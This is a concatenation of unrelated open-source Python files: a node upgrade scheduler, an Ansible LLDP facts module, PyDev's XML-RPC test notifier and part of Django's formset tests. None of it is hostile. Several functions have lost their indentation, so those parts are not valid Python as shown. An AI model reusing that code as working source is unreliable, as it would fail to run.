last_event = self.lastUpgradeEventInfo
if last_event and last_event[3] == upgrade_id and last_event[0] in FINALIZING_EVENT_TYPES:
logger.info(
"Node '{}' has already performed an upgrade with upgrade_id {}. "
"Last recorded event is {}".format(
self.nodeName, upgrade_id, last_event))
return
when = txn[SCHEDULE][self.nodeId]
failTimeout = txn.get(TIMEOUT, self.defaultUpgradeTimeout)
if not self.is_version_upgradable(
currentVersion, version, reinstall):
return
if self.scheduledUpgrade:
if isinstance(when, str):
when = dateutil.parser.parse(when)
if self.scheduledUpgrade == (version, when, upgrade_id):
logger.debug("Node {} already scheduled upgrade to version '{}' ".format(
self.nodeName, version))
return
else:
logger.info(
"Node '{}' cancels previous upgrade and schedules a new one to {}".format(
self.nodeName, version))
self._cancelScheduledUpgrade(justification)
logger.info("Node '{}' schedules upgrade to {}".format(
self.nodeName, version))
self._scheduleUpgrade(
version, when, failTimeout, upgrade_id)
return
if action == CANCEL:
if self.scheduledUpgrade and self.scheduledUpgrade[0] == version:
self._cancelScheduledUpgrade(justification)
logger.info("Node '{}' cancels upgrade to {}".format(
self.nodeName, version))
return
logger.error(
"Got {} transaction with unsupported action {}".format(
POOL_UPGRADE, action))
def _scheduleUpgrade(self,
version,
when: Union[datetime, str],
failTimeout,
upgrade_id) -> None:
"""
Schedules node upgrade to a newer version
:param version: version to upgrade to
:param when: upgrade time
:param upgrade_id: upgrade identifier (req_id+seq_no) of a txn that started the upgrade
"""
assert isinstance(when, (str, datetime))
logger.info("{}'s upgrader processing upgrade for version {}"
.format(self, version))
if isinstance(when, str):
when = dateutil.parser.parse(when)
now = datetime.utcnow().replace(tzinfo=dateutil.tz.tzutc())
self._notifier.sendMessageUponNodeUpgradeScheduled(
"Upgrade of node '{}' to version {} has been scheduled on {}".format(
self.nodeName, version, when))
self._upgradeLog.appendScheduled(when, version, upgrade_id)
callAgent = partial(self._callUpgradeAgent, when,
version, failTimeout, upgrade_id)
delay = 0
if now < when:
delay = (when - now).total_seconds()
self.scheduledUpgrade = (version, when, upgrade_id)
self._schedule(callAgent, delay)
def _cancelScheduledUpgrade(self, justification=None) -> None:
"""
Cancels scheduled upgrade
:param when: time upgrade was scheduled to
:param version: version upgrade scheduled for
"""
if self.scheduledUpgrade:
why_prefix = ": "
why = justification
if justification is None:
why_prefix = ", "
why = "cancellation reason not specified"
(version, when, upgrade_id) = self.scheduledUpgrade
logger.info("Cancelling upgrade {upgrade_id}"
" of node {node}"
" to version {version}"
" scheduled on {when}"
"{why_prefix}{why}"
.format(upgrade_id=upgrade_id,
node=self.nodeName,
version=version,
when=when,
why_prefix=why_prefix,
why=why))
self._unscheduleUpgrade()
self._upgradeLog.appendCancelled(when, version, upgrade_id)
self._notifier.sendMessageUponPoolUpgradeCancel(
"Upgrade of node '{}' to version {} "
"has been cancelled due to {}".format(
self.nodeName, version, why))
def _unscheduleUpgrade(self):
    """
    Unschedule current upgrade

    Note that it does not add record to upgrade log and does not do
    required steps to resume previous upgrade. If you need this - use
    _cancelScheduledUpgrade
    """
    # Dropping the action queue discards the pending scheduled callback.
    self.aqStash = deque()
    self.scheduledUpgrade = None
def _callUpgradeAgent(self, when, version, failTimeout,
upgrade_id) -> None:
"""
Callback which is called when upgrade time come.
Writes upgrade record to upgrade log and asks
node control service to perform upgrade
:param when: upgrade time
:param version: version to upgrade to
"""
logger.info("{}'s upgrader calling agent for upgrade".format(self))
self._upgradeLog.appendStarted(when, version, upgrade_id)
self._upgrade_start_callback()
self.scheduledUpgrade = None
asyncio.ensure_future(
self._sendUpdateRequest(when, version, upgrade_id, failTimeout))
async def _sendUpdateRequest(self, when, version, upgrade_id, failTimeout):
    """Ask the node control service (over TCP) to perform the upgrade.

    Retries up to self.retry_limit times, pausing self.retry_timeout
    seconds between attempts.  On total failure the upgrade is recorded
    as failed and unscheduled; on success a watchdog is scheduled that
    declares failure if the upgrade does not complete within
    failTimeout minutes.
    """
    retryLimit = self.retry_limit
    while retryLimit:
        try:
            msg = UpgradeMessage(version=version).toJson()
            logger.info("Sending message to control tool: {}".format(msg))
            await self._open_connection_and_send(msg)
            break
        except Exception as ex:
            logger.warning("Failed to communicate to control tool: {}"
                           .format(ex))
            # Bug fix: asyncio.sleep() returns a coroutine; without
            # `await` it was never executed, so there was no pause
            # between retries (plus a "coroutine was never awaited"
            # warning).
            await asyncio.sleep(self.retry_timeout)
            retryLimit -= 1
    if not retryLimit:
        self._upgrade_failed(version=version,
                             scheduled_on=when,
                             upgrade_id=upgrade_id,
                             reason="problems in communication with "
                                    "node control service")
        self._unscheduleUpgrade()
        self._upgradeFailedCallback()
    else:
        logger.info("Waiting {} minutes for upgrade to be performed"
                    .format(failTimeout))
        timesUp = partial(self._declareTimeoutExceeded, when, version, upgrade_id)
        self._schedule(timesUp, self.get_timeout(failTimeout))
async def _open_connection_and_send(self, message: str):
    """Send `message` to the node control service over a fresh TCP
    connection (fire-and-forget; the reader side is unused)."""
    controlServiceHost = self.config.controlServiceHost
    controlServicePort = self.config.controlServicePort
    msgBytes = bytes(message, "utf-8")
    _, writer = await asyncio.open_connection(
        host=controlServiceHost,
        port=controlServicePort
    )
    writer.write(msgBytes)
    # Bug fix: flush the transport before closing; close() immediately
    # after write() could drop the still-buffered payload.
    await writer.drain()
    writer.close()
def _declareTimeoutExceeded(self, when, version, upgrade_id):
"""
This function is called when time for upgrade is up
"""
logger.info("Timeout exceeded for {}:{}".format(when, version))
last = self._upgradeLog.lastEvent
if last and last[1:-1] == (UpgradeLog.UPGRADE_FAILED, when, version):
return None
self._upgrade_failed(version=version,
scheduled_on=when,
upgrade_id=upgrade_id,
reason="exceeded upgrade timeout")
self._unscheduleUpgrade()
self._upgradeFailedCallback()
def _upgrade_failed(self, *,
version,
scheduled_on,
upgrade_id,
reason=None,
external_reason=False):
if reason is None:
reason = "unknown reason"
error_message = "Node {node} failed upgrade {upgrade_id} to " \
"version {version} scheduled on {scheduled_on} " \
"because of {reason}" \
.format(node=self.nodeName,
upgrade_id=upgrade_id,
version=version,
scheduled_on=scheduled_on,
reason=reason)
logger.error(error_message)
if external_reason:
logger.error("This problem may have external reasons, "
"check syslog for more information")
self._notifier.sendMessageUponNodeUpgradeFail(error_message)
class UpgradeMessage:
    """
    Data structure that represents a request for a node update.

    Serialized as a JSON object with a single 'version' field -- the
    wire format expected by the node control service.
    """

    def __init__(self, version: str):
        self.version = version

    def toJson(self):
        # Local import kept to match this module's original style.
        import json
        return json.dumps(self.__dict__)
| apache-2.0 |
nsg/ansible-modules-extras | network/lldp.py | 31 | 2795 | #!/usr/bin/python -tt
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import subprocess
DOCUMENTATION = '''
---
module: lldp
version_added: 1.6
short_description: get details reported by lldp
description:
- Reads data out of lldpctl
options: {}
author: "Andy Hill (@andyhky)"
notes:
- Requires lldpd running and lldp enabled on switches
'''
EXAMPLES = '''
# Retrieve switch/port information
- name: Gather information from lldp
lldp:
- name: Print each switch/port
debug: msg="{{ lldp[item]['chassis']['name'] }} / {{ lldp[item]['port']['ifalias'] }}
with_items: lldp.keys()
# TASK: [Print each switch/port] ***********************************************************
# ok: [10.13.0.22] => (item=eth2) => {"item": "eth2", "msg": "switch1.example.com / Gi0/24"}
# ok: [10.13.0.22] => (item=eth1) => {"item": "eth1", "msg": "switch2.example.com / Gi0/3"}
# ok: [10.13.0.22] => (item=eth0) => {"item": "eth0", "msg": "switch3.example.com / Gi0/3"}
'''
def gather_lldp():
    """Run `lldpctl -f keyvalue` and return its output as a nested dict,
    or None when lldpctl produced no output (matching the original
    implicit-None behaviour that main() relies on)."""
    cmd = ['lldpctl', '-f', 'keyvalue']
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    (output, err) = proc.communicate()
    if output:
        return _parse_lldp_keyvalue(output)
    return None


def _parse_lldp_keyvalue(output):
    """Parse keyvalue-formatted lldpctl output into nested dicts.

    Each line looks like `lldp.eth0.chassis.name=switch1`; the dotted
    path becomes nested dict keys.  A line that does not start with
    'lldp' is treated as a continuation of the previous value and is
    appended with a newline.
    """
    output_dict = {}
    current_dict = output_dict
    path_components, final = [], None
    for entry in output.split("\n"):
        if entry.startswith('lldp'):
            path, value = entry.strip().split("=", 1)
            path = path.split(".")
            path_components, final = path[:-1], path[-1]
        else:
            # Bug fix: a leading non-'lldp' line (e.g. a daemon warning)
            # used to raise NameError because no key had been seen yet;
            # skip such lines instead.
            if final is None:
                continue
            # current_dict still points at the deepest dict of the
            # previous entry, so this extends that entry's value.
            value = current_dict[final] + '\n' + entry
        current_dict = output_dict
        for path_component in path_components:
            current_dict[path_component] = current_dict.get(path_component, {})
            current_dict = current_dict[path_component]
        current_dict[final] = value
    return output_dict
def main():
    # Empty argument spec: this module takes no options and only reports
    # facts.
    module = AnsibleModule({})
    lldp_output = gather_lldp()
    try:
        data = {'lldp': lldp_output['lldp']}
        module.exit_json(ansible_facts=data)
    except TypeError:
        # gather_lldp() returns None when lldpctl produced no output;
        # subscripting None raises TypeError, which is translated into a
        # module failure here.
        module.fail_json(msg="lldpctl command failed. is lldpd running?")
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
nabilbendafi/script.module.pydevd | lib/pydev_runfiles_xml_rpc.py | 11 | 10937 | import threading
import traceback
import warnings
from _pydev_filesystem_encoding import getfilesystemencoding
from pydev_imports import xmlrpclib, _queue
Queue = _queue.Queue
from pydevd_constants import *
#This may happen in IronPython (in Python it shouldn't happen as there are
#'fast' replacements that are used in xmlrpclib.py)
warnings.filterwarnings(
'ignore', 'The xmllib module is obsolete.*', DeprecationWarning)
file_system_encoding = getfilesystemencoding()
#=======================================================================================================================
# _ServerHolder
#=======================================================================================================================
class _ServerHolder:
    '''
    Helper so that we don't have to use a global here.
    '''
    # The xml-rpc server proxy currently in use (installed via SetServer).
    SERVER = None
#=======================================================================================================================
# SetServer
#=======================================================================================================================
def SetServer(server):
    # Install the xml-rpc server proxy used for test-run notifications.
    _ServerHolder.SERVER = server
#=======================================================================================================================
# ParallelNotification
#=======================================================================================================================
class ParallelNotification(object):
    """One queued notification: the remote method name plus the
    positional arguments it should be invoked with."""

    def __init__(self, method, args):
        self.method = method
        self.args = args

    def ToTuple(self):
        # (method, args) -- the shape the queue consumer expects.
        return self.method, self.args
#=======================================================================================================================
# KillServer
#=======================================================================================================================
class KillServer(object):
    '''Sentinel placed on the queue to tell ServerComm to shut down.'''
#=======================================================================================================================
# ServerFacade
#=======================================================================================================================
class ServerFacade(object):
    '''
    Stand-in for the XML-RPC server: every notify* call is turned into a
    ParallelNotification and queued, to be dispatched later in a batch by
    ServerComm.
    '''

    def __init__(self, notifications_queue):
        self.notifications_queue = notifications_queue

    def _enqueue(self, method, args):
        # Single funnel for all notifications.
        self.notifications_queue.put_nowait(ParallelNotification(method, args))

    def notifyTestsCollected(self, *args):
        self._enqueue('notifyTestsCollected', args)

    def notifyConnected(self, *args):
        self._enqueue('notifyConnected', args)

    def notifyTestRunFinished(self, *args):
        self._enqueue('notifyTestRunFinished', args)

    def notifyStartTest(self, *args):
        self._enqueue('notifyStartTest', args)

    def notifyTest(self, *args):
        # Byte/unicode strings must be re-encoded so they survive the
        # XML-RPC transport (see _encode_if_needed).
        args = tuple(_encode_if_needed(arg) for arg in args)
        self._enqueue('notifyTest', args)
#=======================================================================================================================
# ServerComm
#=======================================================================================================================
class ServerComm(threading.Thread):
    '''
    Background thread that drains the notifications queue and forwards the
    queued notifications to the remote XML-RPC server in batches, until a
    KillServer sentinel is received.
    '''

    def __init__(self, notifications_queue, port, daemon=False):
        threading.Thread.__init__(self)
        self.setDaemon(daemon)  # If False, wait for all the notifications to be passed before exiting!
        self.finished = False
        self.notifications_queue = notifications_queue
        import pydev_localhost

        # It is necessary to specify an encoding, that matches
        # the encoding of all bytes-strings passed into an
        # XMLRPC call: "All 8-bit strings in the data structure are assumed to use the
        # packet encoding.  Unicode strings are automatically converted,
        # where necessary."
        # Byte strings most likely come from file names.
        encoding = file_system_encoding
        if encoding == "mbcs":
            # Windows symbolic name for the system encoding CP_ACP.
            # We need to convert it into an encoding that is recognized by Java.
            # Unfortunately this is not always possible. You could use
            # GetCPInfoEx and get a name similar to "windows-1251". Then
            # you need a table to translate on a best effort basis. Much too complicated.
            # ISO-8859-1 is good enough.
            encoding = "ISO-8859-1"

        self.server = xmlrpclib.Server('http://%s:%s' % (pydev_localhost.get_localhost(), port),
                                       encoding=encoding)

    def run(self):
        '''Consume notifications forever; exit after a KillServer is seen.'''
        while True:
            kill_found = False
            commands = []
            # Block until at least one item is available.
            command = self.notifications_queue.get(block=True)
            if isinstance(command, KillServer):
                kill_found = True
            else:
                assert isinstance(command, ParallelNotification)
                commands.append(command.ToTuple())

            try:
                # Drain whatever else is already queued so that multiple
                # notifications go out in a single XML-RPC call.
                while True:
                    command = self.notifications_queue.get(block=False)  # No block to create a batch.
                    if isinstance(command, KillServer):
                        kill_found = True
                    else:
                        assert isinstance(command, ParallelNotification)
                        commands.append(command.ToTuple())
            except:
                pass  # That's OK, we're getting it until it becomes empty so that we notify multiple at once.

            if commands:
                try:
                    self.server.notifyCommands(commands)
                except:
                    traceback.print_exc()

            if kill_found:
                self.finished = True
                return
#=======================================================================================================================
# InitializeServer
#=======================================================================================================================
def InitializeServer(port, daemon=False):
    '''
    Create the global notification server on first call and announce the
    connection.

    With a *port*, a queue-backed ServerFacade plus a ServerComm dispatcher
    thread are created; without one, Null stand-ins keep the interface
    working with no actual connection.
    '''
    if _ServerHolder.SERVER is None:
        if port is None:
            # Null server: preserve the interface without any connection.
            _ServerHolder.SERVER = Null()
            _ServerHolder.SERVER_COMM = Null()
        else:
            notifications_queue = Queue()
            _ServerHolder.SERVER = ServerFacade(notifications_queue)
            _ServerHolder.SERVER_COMM = ServerComm(notifications_queue, port, daemon)
            _ServerHolder.SERVER_COMM.start()

    try:
        _ServerHolder.SERVER.notifyConnected()
    except:
        traceback.print_exc()
#=======================================================================================================================
# notifyTest
#=======================================================================================================================
def notifyTestsCollected(tests_count):
    '''Report the number of collected tests (must not be None) to the server.'''
    assert tests_count is not None
    server = _ServerHolder.SERVER
    try:
        server.notifyTestsCollected(tests_count)
    except:
        traceback.print_exc()
#=======================================================================================================================
# notifyStartTest
#=======================================================================================================================
def notifyStartTest(file, test):
    '''
    Notify the server that a test is starting.

    @param file: the tests file (c:/temp/test.py)
    @param test: the test ran (i.e.: TestCase.test1)
    '''
    assert file is not None
    if test is None:
        # May happen on an import error while importing the module.
        test = ''

    server = _ServerHolder.SERVER
    try:
        server.notifyStartTest(file, test)
    except:
        traceback.print_exc()
def _encode_if_needed(obj):
    '''
    Wrap string/bytes values in an xmlrpclib.Binary encoded as ISO-8859-1,
    since the Java side expects that encoding
    (org.python.pydev.debug.pyunit.PyUnitServer).  Anything that is not a
    string type is returned unchanged.
    '''
    target = 'ISO-8859-1'
    errors = 'xmlcharrefreplace'
    if IS_PY3K:
        if isinstance(obj, str):  # Unicode in py3
            return xmlrpclib.Binary(obj.encode(target, errors))
        elif isinstance(obj, bytes):
            try:
                return xmlrpclib.Binary(obj.decode(sys.stdin.encoding).encode(target, errors))
            except:
                return xmlrpclib.Binary(obj)  # keep the raw bytes
    else:
        if isinstance(obj, str):
            try:
                return xmlrpclib.Binary(obj.decode(sys.stdin.encoding).encode(target, errors))
            except:
                return xmlrpclib.Binary(obj)
        elif isinstance(obj, unicode):
            return xmlrpclib.Binary(obj.encode(target, errors))
    return obj
#=======================================================================================================================
# notifyTest
#=======================================================================================================================
def notifyTest(cond, captured_output, error_contents, file, test, time):
    '''
    Notify the server of a finished test.

    @param cond: ok, fail, error
    @param captured_output: output captured from stdout
    @param error_contents: output captured from stderr
    @param file: the tests file (c:/temp/test.py)
    @param test: the test ran (i.e.: TestCase.test1)
    @param time: float with the number of seconds elapsed
    '''
    for required in (cond, captured_output, error_contents, file):
        assert required is not None
    if test is None:
        test = ''  # Could happen if we have an import error importing module.
    assert time is not None

    try:
        _ServerHolder.SERVER.notifyTest(
            cond,
            _encode_if_needed(captured_output),
            _encode_if_needed(error_contents),
            file, test, time)
    except:
        traceback.print_exc()
#=======================================================================================================================
# notifyTestRunFinished
#=======================================================================================================================
def notifyTestRunFinished(total_time):
    '''Report the total elapsed time (must not be None) for the whole run.'''
    assert total_time is not None
    server = _ServerHolder.SERVER
    try:
        server.notifyTestRunFinished(total_time)
    except:
        traceback.print_exc()
#=======================================================================================================================
# forceServerKill
#=======================================================================================================================
def forceServerKill():
    '''Stop the ServerComm thread by queueing a KillServer sentinel.'''
    queue = _ServerHolder.SERVER_COMM.notifications_queue
    queue.put_nowait(KillServer())
| epl-1.0 |
oshanz/Learn-Django | tests/forms_tests/tests/test_formsets.py | 51 | 51180 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from django.forms import (CharField, DateField, FileField, Form, IntegerField,
SplitDateTimeField, ValidationError, formsets)
from django.forms.formsets import BaseFormSet, formset_factory
from django.forms.util import ErrorList
from django.test import TestCase
class Choice(Form):
    # Minimal two-field form used throughout the formset tests.
    # Field declaration order determines rendering order, so do not reorder.
    choice = CharField()
    votes = IntegerField()

# FormSet allows us to use multiple instance of the same form on 1 page. For now,
# the best way to create a FormSet is by using the formset_factory function.
ChoiceFormSet = formset_factory(Choice)
class FavoriteDrinkForm(Form):
    # Single-field form; combined with BaseFavoriteDrinksFormSet below to
    # exercise formset-level clean().
    name = CharField()
class BaseFavoriteDrinksFormSet(BaseFormSet):
    '''Formset that rejects the same drink name appearing more than once.'''

    def clean(self):
        seen = set()
        for data in self.cleaned_data:
            name = data['name']
            if name in seen:
                raise ValidationError('You may only specify a drink once.')
            seen.add(name)
class EmptyFsetWontValidate(BaseFormSet):
    # clean() always raises, so a formset using this class can never validate;
    # lets tests check that clean() runs even when the formset has no forms.
    def clean(self):
        raise ValidationError("Clean method called")

# Let's define a FormSet that takes a list of favorite drinks, but raises an
# error if there are any duplicates. Used in ``test_clean_hook``,
# ``test_regression_6926`` & ``test_regression_12878``.
FavoriteDrinksFormSet = formset_factory(FavoriteDrinkForm,
    formset=BaseFavoriteDrinksFormSet, extra=3)

# Used in ``test_formset_splitdatetimefield``.
class SplitDateTimeForm(Form):
    # Callable initial: evaluated each time the form is rendered.
    when = SplitDateTimeField(initial=datetime.datetime.now)

SplitDateTimeFormSet = formset_factory(SplitDateTimeForm)
class FormsFormsetTestCase(TestCase):
def make_choiceformset(self, formset_data=None, formset_class=ChoiceFormSet,
        total_forms=None, initial_forms=0, max_num_forms=0, **kwargs):
    """
    Build a *formset_class* instance from *formset_data*, a list of
    (choice, votes) tuples, synthesizing the management-form fields
    (TOTAL_FORMS / INITIAL_FORMS / MAX_NUM_FORMS).

    With no *formset_data*, an unbound formset is returned.
    """
    kwargs.setdefault('prefix', 'choices')
    kwargs.setdefault('auto_id', False)

    if formset_data is None:
        return formset_class(**kwargs)

    if total_forms is None:
        total_forms = len(formset_data)

    prefix = kwargs['prefix']
    data = {
        '%s-TOTAL_FORMS' % prefix: str(total_forms),
        '%s-INITIAL_FORMS' % prefix: str(initial_forms),
        '%s-MAX_NUM_FORMS' % prefix: str(max_num_forms),
    }
    for index, (choice, votes) in enumerate(formset_data):
        data['%s-%d-choice' % (prefix, index)] = choice
        data['%s-%d-votes' % (prefix, index)] = votes
    return formset_class(data, **kwargs)
def test_basic_formset(self):
    """A formset builds like a form; cleaned_data/errors are per-form lists."""
    # A FormSet constructor takes the same arguments as Form. Let's create a FormSet
    # for adding data. By default, it displays 1 blank form. It can display more,
    # but we'll look at how to do so later.
    formset = self.make_choiceformset()
    self.assertHTMLEqual(str(formset), """<input type="hidden" name="choices-TOTAL_FORMS" value="1" /><input type="hidden" name="choices-INITIAL_FORMS" value="0" /><input type="hidden" name="choices-MAX_NUM_FORMS" value="1000" />
<tr><th>Choice:</th><td><input type="text" name="choices-0-choice" /></td></tr>
<tr><th>Votes:</th><td><input type="number" name="choices-0-votes" /></td></tr>""")

    # We treat FormSet pretty much like we would treat a normal Form. FormSet has an
    # is_valid method, and a cleaned_data or errors attribute depending on whether all
    # the forms passed validation. However, unlike a Form instance, cleaned_data and
    # errors will be a list of dicts rather than just a single dict.
    formset = self.make_choiceformset([('Calexico', '100')])
    self.assertTrue(formset.is_valid())
    self.assertEqual([form.cleaned_data for form in formset.forms], [{'votes': 100, 'choice': 'Calexico'}])

    # If a FormSet was not passed any data, its is_valid and has_changed
    # methods should return False.
    formset = self.make_choiceformset()
    self.assertFalse(formset.is_valid())
    self.assertFalse(formset.has_changed())

def test_formset_validation(self):
    """A field error in one form shows up in that form's errors dict."""
    # FormSet instances can also have an error attribute if validation failed for
    # any of the forms.
    formset = self.make_choiceformset([('Calexico', '')])
    self.assertFalse(formset.is_valid())
    self.assertEqual(formset.errors, [{'votes': ['This field is required.']}])

def test_formset_has_changed(self):
    """has_changed() is True whenever any form data was submitted."""
    # FormSet instances has_changed method will be True if any data is
    # passed to his forms, even if the formset didn't validate
    blank_formset = self.make_choiceformset([('', '')])
    self.assertFalse(blank_formset.has_changed())

    # invalid formset test
    invalid_formset = self.make_choiceformset([('Calexico', '')])
    self.assertFalse(invalid_formset.is_valid())
    self.assertTrue(invalid_formset.has_changed())

    # valid formset test
    valid_formset = self.make_choiceformset([('Calexico', '100')])
    self.assertTrue(valid_formset.is_valid())
    self.assertTrue(valid_formset.has_changed())

def test_formset_initial_data(self):
    """``initial`` pre-fills forms; an extra blank form is appended."""
    # We can also prefill a FormSet with existing data by providing an ``initial``
    # argument to the constructor. ``initial`` should be a list of dicts. By default,
    # an extra blank form is included.
    initial = [{'choice': 'Calexico', 'votes': 100}]
    formset = self.make_choiceformset(initial=initial)
    form_output = []

    for form in formset.forms:
        form_output.append(form.as_ul())

    self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Choice: <input type="text" name="choices-1-choice" /></li>
<li>Votes: <input type="number" name="choices-1-votes" /></li>""")

    # Let's simulate what would happen if we submitted this form.
    formset = self.make_choiceformset([('Calexico', '100'), ('', '')], initial_forms=1)
    self.assertTrue(formset.is_valid())
    self.assertEqual([form.cleaned_data for form in formset.forms], [{'votes': 100, 'choice': 'Calexico'}, {}])

def test_second_form_partially_filled(self):
    """A fully blank extra form is allowed; a partially filled one is validated."""
    # But the second form was blank! Shouldn't we get some errors? No. If we display
    # a form as blank, it's ok for it to be submitted as blank. If we fill out even
    # one of the fields of a blank form though, it will be validated. We may want to
    # required that at least x number of forms are completed, but we'll show how to
    # handle that later.
    formset = self.make_choiceformset([('Calexico', '100'), ('The Decemberists', '')], initial_forms=1)
    self.assertFalse(formset.is_valid())
    self.assertEqual(formset.errors, [{}, {'votes': ['This field is required.']}])

def test_delete_prefilled_data(self):
    """Blanking out an initial form triggers required-field errors."""
    # If we delete data that was pre-filled, we should get an error. Simply removing
    # data from form fields isn't the proper way to delete it. We'll see how to
    # handle that case later.
    formset = self.make_choiceformset([('', ''), ('', '')], initial_forms=1)
    self.assertFalse(formset.is_valid())
    self.assertEqual(formset.errors, [{'votes': ['This field is required.'], 'choice': ['This field is required.']}, {}])
def test_displaying_more_than_one_blank_form(self):
    """``extra`` controls how many blank forms are rendered and accepted back."""
    # Displaying more than 1 blank form ###########################################
    # We can also display more than 1 empty form at a time. To do so, pass a
    # extra argument to formset_factory.
    ChoiceFormSet = formset_factory(Choice, extra=3)

    formset = ChoiceFormSet(auto_id=False, prefix='choices')
    form_output = []

    for form in formset.forms:
        form_output.append(form.as_ul())

    self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" /></li>
<li>Votes: <input type="number" name="choices-0-votes" /></li>
<li>Choice: <input type="text" name="choices-1-choice" /></li>
<li>Votes: <input type="number" name="choices-1-votes" /></li>
<li>Choice: <input type="text" name="choices-2-choice" /></li>
<li>Votes: <input type="number" name="choices-2-votes" /></li>""")

    # Since we displayed every form as blank, we will also accept them back as blank.
    # This may seem a little strange, but later we will show how to require a minimum
    # number of forms to be completed.
    data = {
        'choices-TOTAL_FORMS': '3',  # the number of forms rendered
        'choices-INITIAL_FORMS': '0',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '0',  # max number of forms
        'choices-0-choice': '',
        'choices-0-votes': '',
        'choices-1-choice': '',
        'choices-1-votes': '',
        'choices-2-choice': '',
        'choices-2-votes': '',
    }

    formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
    self.assertTrue(formset.is_valid())
    self.assertEqual([form.cleaned_data for form in formset.forms], [{}, {}, {}])

def test_single_form_completed(self):
    """Filling out only one of several blank forms still validates."""
    # We can just fill out one of the forms.
    data = {
        'choices-TOTAL_FORMS': '3',  # the number of forms rendered
        'choices-INITIAL_FORMS': '0',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '0',  # max number of forms
        'choices-0-choice': 'Calexico',
        'choices-0-votes': '100',
        'choices-1-choice': '',
        'choices-1-votes': '',
        'choices-2-choice': '',
        'choices-2-votes': '',
    }

    ChoiceFormSet = formset_factory(Choice, extra=3)
    formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
    self.assertTrue(formset.is_valid())
    self.assertEqual([form.cleaned_data for form in formset.forms], [{'votes': 100, 'choice': 'Calexico'}, {}, {}])

def test_formset_validate_max_flag(self):
    """validate_max rejects submissions exceeding max_num with a non-form error."""
    # If validate_max is set and max_num is less than TOTAL_FORMS in the
    # data, then throw an exception. MAX_NUM_FORMS in the data is
    # irrelevant here (it's output as a hint for the client but its
    # value in the returned data is not checked)
    data = {
        'choices-TOTAL_FORMS': '2',  # the number of forms rendered
        'choices-INITIAL_FORMS': '0',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '2',  # max number of forms - should be ignored
        'choices-0-choice': 'Zero',
        'choices-0-votes': '0',
        'choices-1-choice': 'One',
        'choices-1-votes': '1',
    }

    ChoiceFormSet = formset_factory(Choice, extra=1, max_num=1, validate_max=True)
    formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
    self.assertFalse(formset.is_valid())
    self.assertEqual(formset.non_form_errors(), ['Please submit 1 or fewer forms.'])

def test_second_form_partially_filled_2(self):
    """A partially completed extra form fails validation."""
    # And once again, if we try to partially complete a form, validation will fail.
    data = {
        'choices-TOTAL_FORMS': '3',  # the number of forms rendered
        'choices-INITIAL_FORMS': '0',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '0',  # max number of forms
        'choices-0-choice': 'Calexico',
        'choices-0-votes': '100',
        'choices-1-choice': 'The Decemberists',
        'choices-1-votes': '',  # missing value
        'choices-2-choice': '',
        'choices-2-votes': '',
    }

    ChoiceFormSet = formset_factory(Choice, extra=3)
    formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
    self.assertFalse(formset.is_valid())
    self.assertEqual(formset.errors, [{}, {'votes': ['This field is required.']}, {}])
def test_more_initial_data(self):
    """``extra`` blank forms are appended after initial data; empty_form works."""
    # The extra argument also works when the formset is pre-filled with initial
    # data.
    data = {
        'choices-TOTAL_FORMS': '3',  # the number of forms rendered
        'choices-INITIAL_FORMS': '0',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '0',  # max number of forms
        'choices-0-choice': 'Calexico',
        'choices-0-votes': '100',
        'choices-1-choice': '',
        'choices-1-votes': '',  # missing value
        'choices-2-choice': '',
        'choices-2-votes': '',
    }

    initial = [{'choice': 'Calexico', 'votes': 100}]
    ChoiceFormSet = formset_factory(Choice, extra=3)
    formset = ChoiceFormSet(initial=initial, auto_id=False, prefix='choices')
    form_output = []

    for form in formset.forms:
        form_output.append(form.as_ul())

    self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Choice: <input type="text" name="choices-1-choice" /></li>
<li>Votes: <input type="number" name="choices-1-votes" /></li>
<li>Choice: <input type="text" name="choices-2-choice" /></li>
<li>Votes: <input type="number" name="choices-2-votes" /></li>
<li>Choice: <input type="text" name="choices-3-choice" /></li>
<li>Votes: <input type="number" name="choices-3-votes" /></li>""")

    # Make sure retrieving an empty form works, and it shows up in the form list
    self.assertTrue(formset.empty_form.empty_permitted)
    self.assertHTMLEqual(formset.empty_form.as_ul(), """<li>Choice: <input type="text" name="choices-__prefix__-choice" /></li>
<li>Votes: <input type="number" name="choices-__prefix__-votes" /></li>""")

def test_formset_with_deletion(self):
    """can_delete adds a DELETE flag; flagged forms skip validation."""
    # FormSets with deletion ######################################################
    # We can easily add deletion ability to a FormSet with an argument to
    # formset_factory. This will add a boolean field to each form instance. When
    # that boolean field is True, the form will be in formset.deleted_forms
    ChoiceFormSet = formset_factory(Choice, can_delete=True)

    initial = [{'choice': 'Calexico', 'votes': 100}, {'choice': 'Fergie', 'votes': 900}]
    formset = ChoiceFormSet(initial=initial, auto_id=False, prefix='choices')
    form_output = []

    for form in formset.forms:
        form_output.append(form.as_ul())

    self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Delete: <input type="checkbox" name="choices-0-DELETE" /></li>
